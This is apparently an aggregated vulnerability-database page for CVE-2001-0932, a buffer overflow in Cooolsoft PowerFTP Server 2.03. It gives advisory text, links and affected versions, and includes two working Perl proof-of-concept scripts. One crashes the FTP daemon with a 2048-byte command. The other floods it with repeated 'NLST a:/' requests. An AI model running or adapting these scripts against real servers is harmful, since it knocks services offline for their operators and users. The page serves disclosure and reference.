CVE-2001-0932
CVSS 7.5
Published: 2001-11-28 00:00:00
Last revised: 2016-10-17 22:13:32

[Original] Buffer overflow in Cooolsoft PowerFTP Server 2.03 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long command.


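[CNNVD] Cooolsoft PowerFTP Server Multiple Denial of Service Vulnerabilities (CNNVD-200111-049)

        A buffer overflow vulnerability exists in Cooolsoft PowerFTP Server version 2.03. A remote attacker can use an overly long command to cause a denial of service and possibly execute arbitrary code.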

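- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not currently available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0932
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0932
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200111-049
(Official data source) CNNVD

- Other Links and Resources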

http://marc.info/?l=bugtraq&m=100698397818175&w=2
(UNKNOWN)  BUGTRAQ  20011128 PowerFTP-server-Bugs&Exploits-Remotes
http://www.securityfocus.com/bid/3595
(VENDOR_ADVISORY)  BID  3595
http://xforce.iss.net/static/7616.php
(VENDOR_ADVISORY)  XF  powerftp-long-command-dos(7616)

- Vulnerability Information

Cooolsoft PowerFTP Server Multiple Denial of Service Vulnerabilities
High risk  Buffer overflow
2001-11-28 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and Patches

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability Information (21162)

Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial Of Service Vulnerability (1) (EDBID:21162)
windows dos
2001-11-29 Verified
0 Alex Hernandez
N/A
source: http://www.securityfocus.com/bid/3595/info


PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.

Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusually long string of arbitrary characters.

It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.

This issue is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed.

#!/usr/bin/perl
# Simple script to send a long 'A^s' command to the server, 
# resulting in the ftpd crashing
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
# G.Maggiotti & H.Oliveira.
# 
#
# Usage: perl -x PowerFTP_Dos.pl -s <server>
#
# Example: 
#
# perl -x PowerFTP_Dos.pl -s 10.0.0.1
# 220 Personal FTP Server ready
# Crash was successful !
#

use Getopt::Std;
use IO::Socket;

print("\nPowerFTP server v2.03 DoS exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048; 
$data .= $foo x $number; $EOL="\015\012";

$remote = IO::Socket::INET->new(
                    Proto => "tcp",
                    PeerAddr => $args{s},
                    PeerPort => "ftp(21)",
                ) || die("Unable to connect to ftp port at $args{s}\n");

$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");


sub usage {die("\nUsage: $0 -s <server>\n\n");}		

- Vulnerability Information (21163)

Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial Of Service Vulnerability (2) (EDBID:21163)
windows dos
2001-11-29 Verified
0 Alex Hernandez
N/A
source: http://www.securityfocus.com/bid/3595/info

#!/usr/bin/perl
#
# Even though the server will deny access, the slow hardware 
# will still hang the machine. This program attempts to 
# exploit this weakness by sending the 'NLST a:/' command to 
# the server 
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
# 
#
# Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass>
#
# Example: 
#
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
# 

use IO::Socket;

print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

#$NUMBER_TO_SEND = 3000; 
$BUFF = 3000; 

if ( scalar @ARGV < 4 ) {
    print "Usage: $0 <server> <port> <user> <pass>\n";
    exit();
}


$target = $ARGV[ 0 ];
$port = $ARGV[ 1 ];
$username = $ARGV[ 2 ];
$password = $ARGV[ 3 ];

print "Creating socket... ";
$sock = new IO::Socket::INET( PeerAddr => $target,
                              PeerPort => int( $port ), 
                                Proto => 'tcp' );
die "$!" unless $sock;
print "done.\n";


read( $sock, $buffer, 1 );


print "Sending username...";
print $sock "USER " . $username . "\n";
read( $sock, $buffer, 1 );
print "done.\n";


print "Sending password...";
print $sock "PASS " . $password . "\n";
read( $sock, $buffer, 1 );
print "done.\n";


print "DoS Attack floppy server...";
for( $i = 0; $i < $BUFF; $i++ ) {

    print $sock "NLST a:/\n";   
    read( $sock, $buffer, 1 );
}

print "done.\n";

close( $sock );
exit();
		

- Vulnerability Information

14053
Cooolsoft PowerFTP Server Long Command Parsing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity, Loss of Availability Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- Vulnerability Description

A remote overflow exists in Cooolsoft PowerFTP server. The PowerFTP server fails to correctly check the size of incoming commands resulting in a buffer overflow. With a specially crafted request composed of a command longer than 2048 characters, an attacker can cause a denial of service to the PowerFTP server resulting in a loss of availability.

- Timeline

2001-11-28 Unknown
2001-11-28 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related References

- Vulnerability Author

- Vulnerability Information

Cooolsoft PowerFTP Server Multiple Denial Of Service Vulnerability
Boundary Condition Error 3595
Yes No
2001-11-29 12:00:00 2009-07-11 09:06:00
Discovered and posted to Bugtraq by Alex Hernandez <al3xhernandez@ureach.com>.

- Affected Program Versions

Cooolsoft PowerFTP 2.10
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
Cooolsoft PowerFTP 2.0 3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0

- Vulnerability Discussion

PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.

Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusually long string of arbitrary characters.

It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.

This issue is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed.

- Exploit

al3x hernandez <al3xhernandez@ureach.com> has provided the following exploits:

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related References
